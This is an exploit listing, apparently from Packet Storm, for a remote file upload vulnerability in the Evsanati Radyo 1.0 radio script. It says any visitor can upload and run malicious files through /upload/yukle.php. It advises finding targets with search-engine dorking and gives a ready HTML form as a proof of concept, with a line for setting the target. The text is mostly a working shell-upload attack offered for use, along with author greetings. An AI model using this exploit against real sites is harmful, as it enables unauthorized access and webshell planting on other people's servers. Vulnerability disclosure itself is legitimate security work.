Lucene search

K
packetstormIndoushkaPACKETSTORM:174238
HistoryAug 21, 2023 - 12:00 a.m.

Evsanati Radyo 1.0 Shell Upload

2023-08-2100:00:00
indoushka
packetstormsecurity.com
120
evsanati radyo 1.0
remote file upload
unauthorized access
exploit
mozilla firefox
windows 10
vuln
donanimplus
file upload vulnerability
`====================================================================================================================================  
| # Title : evsanati radyo v1.0 Remote File Upload Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Franรงais V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |  
| # Vendor : https://donanimplus.com/b/evsanati-v1-0-radyo-scripti |  
====================================================================================================================================  
  
poc :  
  
[+] Dorking ฤฐn Google Or Other Search Enggine   
  
[+] infected file : /upload/yukle.php  
  
[+] Unauthorized administrator access. Allows any visitor to upload malicious files and run them  
  
[+] Some web sites have deleted the upload file so use this code ( note : use after login )  
  
[+] line 5 set your target  
  
<head>  
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />  
</head>  
  
<form action="http://1270.0.0.1/gazipasayalcinemlakcom/upload/yukle.php" method="post" enctype="multipart/form-data">  
  
  
<div align="center">  
  
  
<table border="0" cellspacing="0" cellpadding="0">  
<tr>  
<td><b>Resmi Secin :</b></td>  
<td>&nbsp;<input type="file" name="dosya" size="20"></td>  
</tr>  
<tr>  
<td></td>  
<td><br /><input type="submit" value="Yukle" style="width:220px;"></td>  
</tr>  
</table>  
  
  
</div>  
  
</form>  
  
  
Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |  
=======================================================================================================================================  
`